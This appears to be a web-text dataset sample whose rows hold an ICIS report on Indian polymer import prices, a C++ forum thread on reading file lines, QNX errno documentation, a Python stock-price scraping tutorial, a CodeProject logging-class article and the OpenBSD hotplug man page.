text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
19 December 2011 04:44 [Source: ICIS news] By Ong Sheau Ling ?xml:namespace> SINGAPORE In the week ended 16 December, average low density polyethylene (LDPE) film spot prices were assessed at $1,380/tonne (€1,063/tonne) CFR (cost and freight) Mumbai, down $5/tonne from the previous week; linear low density polyethylene (LLDPE) at $1,250/tonne CFR Mumbai, down $25/tonne, according to ICIS. High-density polyethylene (HDPE) film average prices were at $1,315/tonne, down by $5/tonne from the previous week, while PP raffia average spot prices were assessed at $1,340/tonne CFR Mumbai, $25/tonne lower week on week, ICIS data showed. A much weaker Indian rupee against the US dollar translate to much higher prices of polymer imports compared to domestic material, they said. The rupee fell to a record low of Rs54.30 to the US dollar on 15 December, representing a more than 18% decline from the highs hit in July, on concerns about the country’s slowing economic growth, according to Reuters. “We do not [know] what we will be paying when the cargo arrives, given the volatile [rupee] currency,” a Mumbai-based trader said. To reduce his foreign exchange risk, the trader said he prefers to keep imports low, and concentrate more on trading domestic goods. The sharp depreciation of the rupee prompted Indian banks have also raised limits for opening letter of credits (LCs) to Rs54.00/kg from Rs46.00/kg. Indian players said that it meant a 20% cost increase for buyers to opens LCs for imports. “The Indian government is trying its best to control flow of the rupee, so as to bring a stop to the depreciation of the rupee,” an Indian PE, PP producer said. The depreciation of the rupee also prompted “Our customers who are dependent on imports are helpless now. They do not want to risk paying more when the cargo arrives at their factories,” another Mumbai-based trader said. But within the domestic market, demand is not robust, Indian players said. “Next quarter’s performance is an extension of this [December]. Market will still be slow and based on the demand situation, PE and PP prices will fall,” a third Mumbai-based trader said. On 16 December, offers for PE and PP imports were largely lower compared to the previous week. Thai low density PE (LDPE) film was offered at $1,360/tonne CFR (cost and freight) Mumbai for January shipments. A Iranian HDPE film materials were offered at $1,300/tonne CFR Mumbai for December/January shipments, while Middle East PP raffia products were offered at $1,320-1,360/tonne CFR Mumbai, they said. ($1 = Rs52.75 /
http://www.icis.com/Articles/2011/12/19/9517105/india-pe-pp-import-prices-to-fall-weak-rupee-deters-buyers.html
CC-MAIN-2014-49
refinedweb
451
58.92
How do i get one line of a text file and turn it into a string? Using fstream.h IE. Get line 2 and make it char line2[100]; How do i get one line of a text file and turn it into a string? Using fstream.h IE. Get line 2 and make it char line2[100]; Heh ;something i actually know: #include <iostream.h> #include <fstream.h> char line[100]; int main() { ifstream intput('whatever.txt"); input>>line; cout<<line; input.close(); return 0; } hehehe Code:#if _emo #define stereo_type_i_dislike #endif where/can you specify what line you want? Last edited by Okiesmokie; 03-01-2002 at 08:11 PM. Ok using fstream.h I would just loop throu all the lines you don't want and then grab the one you want like this: Hope that helps ^_^Hope that helps ^_^Code:#include <fstream.h> #include <iostream.h> #define LINE_NUMBER 2 int main() { ifstream i; //Main file object. char buff[100]; //Input buffer. i.open("whatever.txt"); //Open file. //Go throu all line tells the right one. for(int count=0;count<LINE_NUMBER;count++) { i.getline(buff,100); //Get line. } cout<<"Line "<<LINE_NUMBER<<" in the file was the data: "<<buff<<endl; //Tell user results. i.close(); //Close file. return 0; //Done. } Tazar The Demon ------------------------------------- Please check my site out at: thanks =) ------------------------------------- Note: I will help newbies and any other person that I can just ask I'll try to help you out =) My MSN Messager name is: Tazar37@hotmail.com see if I'm online maybe we can talk. =)
https://cboard.cprogramming.com/cplusplus-programming/12130-getting-one-line-text-file.html
CC-MAIN-2017-51
refinedweb
263
86.71
Get It Done in 5 seconds! Are you bored of doing same stuff again? Feeling your life is just doing the same thing over and over again? Here is the thing, today I am going to introduce a tool to automate your BORING stuff — Python. Python is perhaps the most easiest language to learn. Because of your acquired Python skill, you will be able not only to increase your productivity, but also focus on work which you will be more interested in. Let’s get started! I will use an example, paper trading in Singapore stock market as an illustration on how automation could be done. Paper trading allow you to practice investing or trading using virtual money before you really put real money in it. This is a good way to start as to prove whether your strategy works. This is the agenda which I will be sharing: Part 1 — Input the stock code and amount which you want trade in a text file. Part 2 — How to do Web Scraping on your own, the full journey. Part 3 — Clean and tabulate data. Part 4— Output the result into a csv or excel file. Follow the whole journey and you will notice how simple it is to automate your boring stuff and to update your price IN 5 Seconds. Part 1— Input the stock code and amount which you want trade in a text file. Launch a new text file, enter the stock code and the price you will buy given the particular stock, separated by a comma. Launch a new text file, enter the stock code and the price you will buy given the particular stock, separated by a comma as shown Part 2 — How to do Web Scraping on your own, the full journey This is a snapshot of the SGX website. I am going to illustrate how to scrape all trading information contain in this table. Do open a google chrome, right click on the website and you will be able to see the below snapshot. Click on the inspect button, then click on the network tab (top right corner of the below snapshot as highlighted in purple bracket). Next, click on the row as highlighted in purple box and then choose preview as shown in the highlighted green box, both shown in Snapshot 4 below. So you can see from the Preview, all the data are contained in JSON format. Next, click on the purple box (Headers) in Snapshot 5. What I am doing now, is to inspect what elements I should put in to scrape data from this page. From Snapshot 5 above, you will be able to see Request URL, which is the url you need to put in the request part later. Due to encoding issue, “%2c” in the Request URL will be encoded to “,”. If you are interested in encoding, view this link for more information. Now let’s prepare the required information for you to send a proper request to the server. Part 1 Request Url After changing all the “%2c” to “,”, the request url will turn out to be this link below Part 2 Headers Request header is a component of a network packet sent by a browser or client to the server to request for a specific page or data on the Web server. Referring to the purple box in Snapshot 6 , this is the header part which you should put in when you are scraping the website. {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", "Origin": "", "Referer": ""} Now let’s put everything together as shown in the gist below. import requests HEADERS = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36", "Origin": "", "Referer": ""} # Start downloading stocks info from sgx req = requests.get(", headers=HEADERS) Part 3— Clean Data Till now you will have the response in JSON format. we will use Python pandas library to clean the data. First, load in the stock code which you fill in earlier and clean it. with open('selected.txt') as f: selected_sc = f.readlines() selected_sc = [x.replace('\n', '') for x in selected_sc] portfolio = {x.split(',')[0]: float(x.split(',')[1]) for x in selected_sc} Then, load the scraped data into JSON object, then change it to python pandas object. data = json.loads(req.text)['data'] df = pd.DataFrame(data['prices']) Next, rename the column name to be easier to understand. df = df.rename( columns={'b': 'Bid', 'lt': 'Last', 'bv': 'Bid_Volume', 'c': 'Change', 'sv': 'Ask_volume', 'h': 'High', 'l': 'Low', 'o': 'open', 'p': 'Change_percent', 's': 'Ask', 'vl': 'Volume', 'nc': 'Stock_code'}) Finally, filter the interested stock code which you want to invest or trade in and then calculate the price difference. df = df[df['Stock_code'].isin(portfolio.keys())][['Stock_code', 'Last']] df['bought_price'] = df['Stock_code'].map(portfolio) df['percentage_changes'] = (df['Last'] - df['bought_price'])*100 df['percentage_changes'] = df['percentage_changes'].apply( lambda x: '{0:.2f}%'.format(x)) Part 4 — Output the result in a csv or excel file. Save the data to csv file and 🎉WE ARE OFFICIALLY DONE! 🎉 df.to_csv('reseult.csv', index=False) Below is the snapshot of the csv file: Final Thought I am currently working as a Data Scientist, and what I can inform you is that crawling is still very important. Thank you for reading this post. Feel free to leave comments below on topics which you may be interested to know. I will be publishing more posts in future about my experiences and projects. About Author Low. Source: towardsdatascience
https://learningactors.com/get-rid-of-boring-stuff-using-python/
CC-MAIN-2021-31
refinedweb
942
73.68
values of the global errno variable #include <errno.h> The errno variable is set to certain error values by many functions whenever an error has occurred. In QNX, many library functions make use of calls such as Send(), Sendfd() or qnx_vc_attach(). In order to avoid repetition in the description of possible errno values for each library function, the following table summarizes the errno values that may occur when the above functions are called: The following errors may be returned when the filesystem detects a serious problem, or when a device or driver failure occurs: errno may be implemented as a macro, but can always be examined or set as if it were a simple integer variable. Values for errno are defined in the file <errno.h>, and include at least the following values: /* * The following program makes an illegal call * to the write() function, then prints the * value held in 'errno'. */ #include <stdio.h> #include <unistd.h> #include <errno.h> #include <string.h> int main( void ) { int errvalue; errno = 0; write( -1, "hello, world\n", strlen( "hello, world\n" ) ); errvalue = errno; printf( "The error generated was %d\n", errvalue ); return( errvalue ); } POSIX 1003.1 errno may be implemented as a macro, but can always be examined or set as if it were a simple integer variable.
http://users.pja.edu.pl/~jms/qnx/help/watcom/clibref/qnx/errno.html
CC-MAIN-2022-33
refinedweb
216
52.49
Introduction to Perfect Number C++ Perfect numbers in C++ are those numbers whose value is equal to the sigma of its divisors (excluding its own number). Divisors are the denominators which divide a numerator completely without leaving any reminder. It has unique characteristics in them which make them special, and they are complete and absolute in nature. However, it is a very rare phenomenon, and so far, mathematicians have invented only 51 numbers out of the number range from one up to a maximum limit one can imagine, and the super computer can process. Logic Behind Perfect Number There are no traces in history on who has discovered on invented perfect numbers. It is believed that Egyptians had some interest in Perfect numbers, but it was Greeks who did a lot of research on perfect numbers and people like Pythagoras, O’Connor, Robertson took an extensive interest in Perfect numbers. There is a belief that there is an associated perfect number for every prime number, and Mersenne also discovered the formula. The formula is: Where, - P – Primary number and (2P-1) is Mersenne prime. - For primary number 2, the perfect number is 6, and Mersenne prime is 3, and for the next Primary number 3, the perfect number is 28, and Mersenne prime is 7 and so on. Significance of Perfect Number Though there are several theories floating around on the importance of perfect numbers and their link with primary numbers etc., the importance of perfect numbers and their usage is still unclear. Some of the hard facts on perfect numbers are: - Treated like superior over the other numbers. - Easy to understand, but there is no visible use to it. - Not capable of solving any mathematical problems. - Not a great tool in providing solutions in other fields like Business, Economics and Science. Knowledge and background of Perfect numbers help Mathematicians to improve their data analysis skills and build AI models for various scenarios. How to Check Perfect Number in C++? Program steps to find out if a given number is a perfect number or otherwise: - Accept a number that has to be validated for a perfect number. - Divide the number by 1 and check whether the division leaves any remainder. - Since the remainder is zero, the denominator 1 is a perfect divisor and accumulates the divisor in a counter. - Divide the number by 2 and check the remainder and if the remainder is zero, accumulate the divisor in the counter. - Repeat the above step from 3 till one number before the accepted number. - Check the values of the accepted number and the accumulated counter. - If the values are the same, then the accepted number is a Perfect number; otherwise, it is not. Program steps to choose a Perfect number from a given range of numbers: - Accept the first number and last number in the range. - Start with the first number. Then, check whether it is a perfect number using the steps in the above paragraph. If it is a Perfect number, then display the number. - Repeat the above step for the next number in the number range. - Continue the above steps till the last number is in the range. Examples of Perfect Number C++ Given below are the examples of Perfect Number C++: Example #1 Find out if a given number is a perfect number or otherwise. Code: #include <iostream> using namespace std; int main() // Main ... Program starts here { int gno = 6; // The number to be checked int m = 0; // Initialize variables int total = 0; cout << "Check whether this number " << gno <<" is Perfect or not " << ":\n"; // Display the Header for(m=1; m<gno; m=m+1) // For loop start { if(gno % m == 0) // Check Remainder = 0 total = total + m; // If so accumulate } // Check number and accumulated value if(total == gno) cout << "\n" << "YES... The given number is a perfect Number..."; if(total != gno) cout << "\n" << "Sorry it is not perfect no.... Try some other"; } Output: For the given no 6, the result is: For the given number 27, the result is: Change in the code int gno = 27; // The number to be checked For the given number 469, the result is: Change in the code int gno = 469; // The number to be checked For the given number 496, the result is: Change in the code int gno = 496; // The number to be checked Example #2 Identify perfect numbers in a given range of numbers. Code: #include <iostream> using namespace std; int main() // Program starts here { int first = 1; // First in the range int last = 10000; // Last in Range int pcount = 0; int count = 0; // Initializing all the variables int totcount = 0; int j = 0; int m = 0; int total = 0; int pfound = 0; // Header printing cout << "Perfect nos in the Range-" << first <<" and " << last << ":\n"; cout << "\n"; for(j=first; j<=last; j=j+1) // Outer FOR loop { for(m=1; m<j; m=m+1) // For a given number - inner FOR loop { if(j % m == 0) // Check Remainder total = total + m; // Accumulate } if(total == j) // Check { pfound = 1; // Yes Perfect number found pcount = pcount+1; // Display the number cout << "perfect number: " << pcount << " " <<j <<"\n"; } total = 0; count = count + 1; if (count > 999) { totcount = totcount + count; // Display status for every 1000 nos cout <<"processsed "<< totcount << " Numbers" <<"\n"; count = 0; } // inner loop ends } // outer loop ends if(pfound == 0) cout << "There in no perfect number between the given range"; // display if no Perfect no found } Output: The result for a range of numbers ( 1 to 10000): Conclusion Even though Perfect numbers could not find any applications in the real world, the fundamentals and concepts help Mathematicians to build data models around complex real-life issues and derive insights into the data. Recommended Articles This is a guide to Perfect Number C++. Here we discuss the introduction, logic, significance, how to check perfect numbers in C++? and examples. You may also have a look at the following articles to learn more –
https://www.educba.com/perfect-number-c-plus-plus/
CC-MAIN-2022-40
refinedweb
990
55.47
MPL3115A2 Module¶ This module contains the driver for NXP MPL3115A2 Pressure, Altitude and Temperature sensor. The MPL3115A2 is capable of direct I2C communication; the pressure and temperature data is fed into a high resolution ADC to provide fully compensated and digitized outputs for pressure in Pascals and temperature in °C. The compensated pressure output can then be converted to altitude (utilizing the formula stated in Section 8.1.3 “Pressure/altitude” of the datasheet or putting the sensor in altimeter operating mode) provided in meters. - class MPL3115A2(i2cdrv, addr=0x60, clk=400000)¶ Creates an intance of a new MPL3115A2. Example: from nxp.mpl3115a2 import mpl3115a2 ... mpl = mpl3115a2.MPL3115A2(I2C0) mpl.start() mpl.init() alt = mpl.get_alt() pres = mpl.get_pres() get_alt()¶ Calculates, from measured pressure, the current altitude data as value in meters. Returns altitude get_pres()¶ Retrieves the current pressure data from the sensor as calibrate value in Pa. Returns pres
https://docs.zerynth.com/latest/official/lib.nxp.mpl3115a2/docs/official_lib.nxp.mpl3115a2_mpl3115a2.html
CC-MAIN-2020-24
refinedweb
150
50.33
Code. Collaborate. Organize. No Limits. Try it Today. The Complete class documentation can be found at. Often times we want to create a log of what steps a program takes during run-time. Maybe our program works fine on all of our computers in house, but it is crashing at a customer's site. Or maybe we are developing on WinNT, but are testing on Win98 without a development environment on the Win98 machine. Since we can't debug in these cases, it would be nice to have a log of all the steps a program took before it crashed. This set of projects perform program logging and offer numerous features: This is version 3 of the code. Version 3 has undergone a major re-write, and many of the functions that once were part of the SS_Log class have now been deprecated. All deprecated functions are still supported, so your older code should still work with this version, but for those who've use this code in the past, please make yourself familiar with the new calls. In the first version of this code, if writing to a file, we would write and flush each message immediately when the message was logged. This caused a good bit of slowdown. The reason for the immediate flush was, if your program crashed, you'd be guaranteed to have all messages that were logged before the crash. The new design still guarantees that all messages will be logged, but we won't force the overhead of flushing to file every time. Instead, all messages get sent to a server in a separate process that is launched and terminated on the fly, and the server will flush the contents out when it gets the chance. I want to thank Graven for this suggestion. That and the "dynamically filter after the fact" suggestions are the basis of the new design, and they were his ideas. Several other people made suggestions too, and I appreciate all of them. I implemented many of them, and those that I did not, I will definitely keep on the list for the future. Integration into your project is easy. The following steps are necessary: That should about do it. The SS_Log code will handle the rest. If you downloaded the sources rather than the binaries, compile the projects in the following order: #include <span class="code-string">"SS_Log.h" </span> main() { Log("Hello World!"); } ... and as long as you've not forgotten to #define _SS_LOG_ACTIVE in your precompiler, this code will produce a log with the filename, line number, date/time, default filter, message ID, and your message text. Before reading this whole article (as it is quite long), you might want to just look in the sample program (SS_Log_Test.cpp) that is included in the sources. There are extensive comments, and it might take less time to pick up the jist of things there. That project will not show everything available to you, but should get you started. As some point you should read the article if you want to learn the full functionality from SS_Log. The global log is a single instance of the SS_Log class that is available to all files that include SS_Log.h. You can begin using the global log immediately just by including that file, using the following macros: 1. INT Log(TCHAR* pMsg, ...); 2. INT Log(DWORD dwFilter, TCHAR* pMsg, ...); 3. INT LogID(UINT nResourceID, ...); 4. INT LogID(DWORD dwFilter, UINT nResourceID, ...); The simplest form (the first macro above) takes an sprintf-style format string and a variable number of parameters that will be formatted into the final message. You can access configuration options for the global log with the following macros (we will discuss each in turn): 5. DWORD LogSetFlags(DWORD dwFlags); 6. DWORD LogGetFlags(); 7. DWORD LogRemoveFlags(DWORD dwFlags); 8. DWORD LogAddFlags(DWORD dwFlags); 9. INT LogSetDestinationName(LPCTSTR szName); 10. INT LogEraseLog(); 11. INT LogLimitOutputSize(DWORD dwSizeLimit); 12. INT LogGetLastError(); 13. INT LogSetRegistryKey(LPCTSTR szRegKey); 14. VOID LogUseServer(BOOL bUseServer); 15. BOOL LogSucceeded(); 16. VOID LogInstanceHandle(HANDLE hInstance); 17. VOID LogEnterFunction(LPCTSTR szFunctionName); The first configuration function we need to talk about is the LogUseServer() function. By default, the SS_Log class will launch a separate process, the SS_Log_Server application (which must be in the %SYSTEMROOT% directory), to capture all messages. There is one main reason for using a separate process: Speed. If we logged everything straight to a file (as the first version of SS_Log did), we would need to flush each and every message to disk immediately after it was logged to ensure that, in the event of a program crash, we didn't drop any messages. Flushing every message is VERY inefficient though, and can easily cause performance problems. LogUseServer() The SS_Log_Server class will be launched on demand and will prepare a named pipe to receive all messages. Then it will flush these messages out when it gets a chance, never hindering your application, which has long since moved on to other things. During testing, I logged over 100,000 messages in under 10 seconds (AMD 1700+) using the server, and only 1,000 in more than 10 seconds without the server. The server will even terminate itself when the instance of the SS_Log class that started it is destructed. If for some reason you still don't want to use the server, the SS_Log class still supports flushing every message straight out to a file. Call the LogUseServer(FALSE) to use this behavior. LogUseServer(FALSE) Macros 5-8 above allow the user to specify the default flags that will be sent with every message (unless overridden in the message). All flags are grouped into 3 categories: LOGTYPE_CRITICAL LOGTYPE_WARNING LOGTYPE_NORMAL LOGTYPE_TRACE LOGTYPE_TRACE_FAIL LOGTYPE_INOUT LOGTYPE_DEBUG LOGTYPE_RELEASE LOGTYPE_LOGTOWINDOW LOGTYPE_LOGTOFILE LOGTYPE_LOGTOEVENTLOG Call the LogAddFlags(...) and LogRemoveFlags(...) functions to add or remove any combination of flags using the bitwise OR operator ("|"). These two functions work just as expected in that the flags you pass in will be added or removed from the default list. LogAddFlags(...) LogRemoveFlags(...) Use the LogSetFlags(...) to overwrite flags in the same group as those flags that you are passing in. This functionality may be a little different than expected. For example, if you were to call LogSetFlags(LOGTYPE_CRITICAL | LOGTYPE_LOGTOEVENTLOG), any currently set flags in the Level/User group will be overwritten by the LOGTYPE_CRITICAL flag, and any current ones in the destinations groups will be replaced with the LOGTYPE_LOGTOEVENTLOG. You can also ask for which flags are currently set as the defaults by calling LogGetFlags(...). LogSetFlags(...) LogSetFlags(LOGTYPE_CRITICAL | LOGTYPE_LOGTOEVENTLOG) LogGetFlags(...) There are no restrictions on the combination of flags that can be set. Any number of flags from any group can be set at any time (ex. while it might not make much sense to set critical and warning flags, both can be set at the same time. On the other hand, it may well make sense to set multiple destinations, such as to file and to window). All messages will be sent with the flags that are currently set, but you can override the current flags on a per-message-basis with macros #2 and #4 described above. When overriding the current flags, only those in the group passed in will be overridden (just as when calling the LogSetFlags(...) function). Currently there are three destinations available, though you can make your own (derive a class from the SSLogDestination class). Messages are "dispatched" to each destination for which one of the destination flags is set (see the destination flags listed above). SSLogDestination The With the LOGTYPE_LOGTOFILE flag set, all messages will be sent to the filename specified in the LogSetDestinationName(...) function. The file will be placed in the local directory of the calling application unless you specify otherwise in the destination name. LogSetDestinationName(...) The LOGTYPE_LOGTOEVENTLOG flag will send all messages to the NT event log. Note that Win9x can be configured to send these messages to a file (see the MSDN ReportEvent() and RegisterEventSource() functions for details). The LOGTYPE_LOGTOWINDOW flag is more unique. The "window" (which we will call the "viewer") is actually an MFC single document application that is part of the SS_Log_Server.exe. All messages will be sent to the server, and the server will display this single document window, placing the messages in a list view. More details on the viewer below. Call LogGetLastError() to get one of the SS_Log defined errors, found here. Use LogSucceeded() to get a BOOL value stating whether or not the last call was a success. LogGetLastError() LogSucceeded() The LogEraseLog() macro will cause the viewer and file destinations to erase their logs. The NT event log is unaffected by this call. LogEraseLog() The LogLimitOutputSize() macro currently only affects the file destination. Pass in the number of kilobytes that you do not want your log file to exceed. The file destination will monitor the file size, and when a message will cause it to exceed this size, the file will be trimmed in half, throwing away the oldest 50% of the messages and making room for new ones. LogLimitOutputSize() The LogSetRegistryKey() macro controls where in the registry SS_Log will keep its settings. This allows you to use the SS_Log in multiple projects and not have them bump heads. Note that currently you only get to specify a portion of the key. If you pass in "MyCompany\MyApp" as your registry key, the SS_Log will store its settings in HKEY_LOCAL_MACHINE\Software\MyCompany\MyApp\SS_Log. LogSetRegistryKey() The LogInstanceHandle() macro will give the SS_Log class your application's instance handle, which is necessary when using the LogID(...) macros. If you don't set the instance handle first, calls to LogID(...) will fail. LogInstanceHandle() LogID(...) The LogEnterFunction() macro actually logs two messages. Call this function when entering a function and pass in the function's name. An "Entering MyFunction" message will be created when this line of code is run AND an "Exiting MyFunction" message will be sent when the function exits. LogEnterFunction() You can compile out all logging to the global log by simply not #defining _SS_LOG_ACTIVE. This will also compile out all logging for local logs ONLY IF you compile the SS_Log.cpp and SS_Log_Defines.cpp files with your project rather than linking to the SS_Log.lib and SS_LogD.lib files. Regardless of whether or not you #define _SS_LOG_ACTIVE, you can still eliminate ALL logging by setting the "LoggingDisabled" value in the registry to 1 (or anything other than 0). Each instance of the SS_Log will read this value in during construction and obey it's value. The registry will be re-read when the user specify's a different registry key in a call to the SetRegistryKey function described above. Currently I have not provided a way to programmatically set this value. You must set this value in the registry manually (i.e. open regedit). Up to now, everything you've learned has been centered around the Global Log. This log is simple a globally available instance of the SS_Log class that was created for you when your application fired up. You are not limited to using this log, however. You can create as many "local logs" as you need. This will help you to keep different information separate (such as logging to separate logs per thread, per module, or however you'd like to organize it). To create your own instance of the SS_Log class and log two messages to it, use the following code: SS_Log myLog("MyServerName"); Log(&myLog, "This is my value: %d.", nMyValue); LogID(&myLog, nResourceID); The first time you log a message, your instance will launch a new server (even if one has already been launched from the global log). All messages from this instance will be sent to that server. The server will close itself once this instance of the SS_Log is destructed. You can access all the configuration functions just like in the global log, except that you don't use the macros: 18. DWORD myLog.SetFlags(DWORD dwFlags); 19. DWORD myLog.GetFlags(); 20. DWORD myLog.RemoveFlags(DWORD dwFlags); 21. DWORD myLog.AddFlags(DWORD dwFlags); 22. INT myLog.SetDestinationName(LPCTSTR szName); 23. INT myLog.ErasemyLog.(); 24. INT myLog.LimitOutputSize(DWORD dwSizeLimit); 25. INT myLog.GetLastError(); 26. INT myLog.SetRegistryKey(LPCTSTR szRegKey); 27. VOID myLog.UseServer(BOOL bUseServer); 28. BOOL myLog.Succeeded(); 29. VOID myLog.InstanceHandle(HANDLE hInstance); 30. VOID LocalLogEnterFunction(SS_Log* pLog, LPCTSTR szFunctionName); A couple things to note: The viewer (or "window") and the server are both one app (SS_Log_Server.exe). As described earlier, the SS_Log class will start an instance of the server when needed, and terminate that server when it is done. What wasn't mentioned is that if you had the LOGTYPE_LOGTOWINDOW flag set on any of the messages that were sent to the server and if the filter in the registry is allowing LOGTYPE_LOGTOWINDOW messages to be processed, that instance of the SS_Log_Server will remain open and display its window even after the SS_Log that started it is destructed. This is so you can view the messages that were logged to the window. You can also start the SS_Log_Server.exe yourself and open logs saved for sorting/filtering/printing/jumping to code (the print output is weak at best... if anyone wants to have a go at improving it, I'll integrate your code . Files that have been written out with the file destination (the LOGTYPE_LOGTOFILE flag) and files that were saved by the viewer itself can both be opened. You can filter messages in two ways. The first is by filtering out messages as they come into the server. When using this method of filtering, the messages are simply thrown away, leave no way to retrieve them in the future (hence the "destructive" term). You can turn these filters on and off by clicking on "Edit->Filter Incoming Server Messages (destructive)" in the server window (options that are grayed out are not supported in this filter mode). A dialog will pop up will checkboxes for each flag type (including user defined flag types, discussed in the Create You Own Filters section). For a message to arrive at its destination(s), at least 1 flag IN EACH GROUP must be set and the corresponding filter must be turned on. You can also turn the filters on and off directly in the registry. They will be located where you specified with a call to the SetRegistryKey(...) function. If you never call that function, the SS_Log class defaults to behaving as if you had called it and passed in "SS_Log" (see "#SetRegistryKey">SetRegistryKey(...)). SetRegistryKey(...) "#SetRegistryKey">SetRegistryKey(...) Note that because these filters are maintained in the registry, they will remain active across separate "runs" of your program. Rather than doing destructive filtering, you can leave all the Incoming Server Messages filters on and then do dynamic filtering in the viewer after your app has terminated. Click on "Edit->Filter Listview (non-destructive)" to see your options. In addition to turning on and off the flag type filters, you can filter by message text, filename, and message ID. You can also specify if all flags or only 1 flag must be set for the message to appear in the view. Note that because these filters are maintained in the registry, they will remain active across separate "runs" of your program. This can be confusing if, for example, you forget that you left a message text filter on and none of your new messages seem to be showing up. Just turn off the filter and they will re-appear. Also note that when saving, ALL messages in the server will be saved to file, even if they are filtered out of the view by the view filters. Printing, however, prints only what is currently in the view, properly obeying the view filters. Probably the neatest feature about the viewer is it's ability make Visual Studio jump to a file and line number. Just double-click on a logged message and Visual Studio will open that file and move to the line that produced the log (if there is not an instance of Visual Studio running, one will be launched). Note that the first time you do that, the viewer will need to install the SS_Log_AddIn.dll as a plug-in to VC++. Make sure you have that file in your %SYSTEMROOT% folder, and that there are no instances of VC++ running during the install. It is very easy to expand the flags with the SS_Log class. The steps to do so are as follows: SS_LogFilterType typedef enum SS_LogFilterType{...} LOGTYPE_XYZ LOGTYPE_XYZ = (1<<9) LOGTYPE_USERS #define LOGTYPEGROUP_USERS ( LOGTYPE_ADD_YOUR_TYPE_HERE | LOGTYPE_XYZ ) SSLogFilter g_Filters[] That's all! One you run your app for the first time (so the new registry entry can be written to the registry), the new filter will appear in the viewer's filter menus, and everything should work as expected. Note that all user flags are part of the levels/user group of flags (creating a destination flag is an exception, but requires much more effort). You can create your own log destination by deriving a class from the SSLogDestination class. There are several overrides that you can implement to receive notification of messages and configuration options sent from an SS_Log instance. These overrides include: // required overrides virtual BOOL OnWriteMessage (LOGMESSAGE* pMsg) = 0; // optional overrides virtual BOOL OnSetDestinationName (LOGMESSAGE* pMsg); virtual BOOL OnEraseLog (LOGMESSAGE* pMsg); virtual BOOL OnLimitOutputSize (LOGMESSAGE* pMsg); virtual BOOL OnSetRegistryKey (LOGMESSAGE* pMsg); virtual BOOL OnShutDownServer (); virtual BOOL OnBeginUpdate (); virtual BOOL OnFinishUpdate (); virtual BOOL WillProcessMessage (LOGMESSAGE* pMsg); The LOGMESSAGE class contains all the information sent with the message from the SS_Log class. It can be found in the stdafx.h file in the SS_Log_Server project, and has the following accessor methods: LOGMESSAGE // Get INT MessageID (); INT ProcessingID (); DWORD Flags (); LPSTR Message (); LPSTR DateTime (); LPSTR Filename (); INT LineNumber (); MSGTYPE MessageType (); // Set VOID MessageID (INT nID); VOID ProcessingID (INT nID); VOID Flags (DWORD nFlags); VOID Message (LPSTR szMsg); VOID DateTime (LPSTR szDT); VOID Filename (LPSTR szFile); VOID LineNumber (INT nLine); VOID MessageType (MSGTYPE nType); The message dispatching routine in the server (see the SSLogOutput.cpp file) will check every 5 seconds to see whether or not the server has received new messages for dispatch. If there are new messages, each destination will get an OnBeginUpdate notification. Then, for each new message, the server will call each destination's WillProcessMessage function to determine whether or not we will be logging the message. This function should return TRUE or FALSE after checking the flags for the message passed in and comparing them against the currently set filters. Note that the default implementation of WillProcessMessage will handle most destinations' needs. OnBeginUpdate WillProcessMessage If the WillProcessMessage returns TRUE, the OnWriteMessage function will be called for that message. Your class MUST override this function and do with the message as you will at that point. OnWriteMessage Once all new messages have been dispatched, the OnFinishUpdate function will be called as a notification that all messages are processed. If the server has received a shutdown request from the SS_Log class, and if no other instances of the SS_Log class are still bound to the server, then your derived class will then receive the OnShutDownServer message in case you need to do some cleanup. OnFinishUpdate OnShutDownServer All other override functions contain configuration data. You can retrieve the configuration data from the LOGMESSAGE's Message() function (passed into the function as the only parameter). The info will be returned in ANSI text format. Note that even though the OnEraseLog function has a LOGMESSAGE parameter, no information is currently stored in it. OnEraseLog Of course, you will need to add a flag to the SS_Log_Defines.h file as described in the Creating Your Own Filters section. Note however, that you should associate the flag with the Destinations group rather than with the Users group. You will also need to create a new instance of your destination type during start up of the server. This can be done in the SSLogOutput::CreateDestination function in the SSLogOutput.cpp file. SSLogOutput::CreateDestination Please feel free to ask questions, offer comments/suggestions, etc. I'm glad to listen and help. This article has no explicit license attached to it but may contain usage terms in the article text or the download files themselves. If in doubt please contact the author via the discussion board below. A list of licenses authors might use can be found here dwType = REG_SZ; _tcscpy(szValue, SSLOG_DEFAULT_DESTINATION_NAME); dwSize = _tcslen(szValue); lr = RegSetValueEx(hKey, _T("DestinationName"), 0, dwType, (LPBYTE)szValue, dwSize); dwSize = _tcslen(szValue)*sizeof(TCHAR); General News Suggestion Question Bug Answer Joke Rant Admin Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.
http://www.codeproject.com/Articles/1640/SS-Log-Fast-program-logging-and-tracing-class?msg=2326264
CC-MAIN-2014-23
refinedweb
3,450
62.68
hotplug — devices hot plugging pseudo-device hotplug 1 #include <sys/types.h> #include <sys/device.h> #include <sys/hotplug.h> The hotplug pseudo-device passes device attachment and detachment events to userland. When a device attaches or detaches, the corresponding event is queued. The events can then be obtained from the queue through the read(2) call on the /dev/hotplug device file. Once an event has been read, it's deleted from the queue. The event queue has a limited size and if it's full all new events will be dropped. Each event is described with the following structure declared in the <sys/hotplug.h> header file: struct hotplug_event { int he_type; /* event type */ enum devclass he_devclass; /* device class */ char he_devname[16]; /* device name */ }; HOTPLUG_DEVATfor device attachment or HOTPLUG_DEVDTfor detachment. The he_devclass field describes the device class. All device classes can be found in the <sys/device.h>header file: enum devclass { DV_DULL, /* generic, no special info */ DV_CPU, /* CPU (carries resource utilization) */ DV_DISK, /* disk drive (label, etc) */ DV_IFNET, /* network interface */ DV_TAPE, /* tape device */ DV_TTY /* serial line interface */ }; Only one structure can be read per call. If there are no events in the queue, the read(2) call will block until an event appears. The hotplug device first appeared in OpenBSD 3.6. The hotplug driver was written by Alexander Yurchenko <grange@openbsd.org>.
https://man.openbsd.org/OpenBSD-current/man4/hotplug.4
CC-MAIN-2020-29
refinedweb
224
58.69
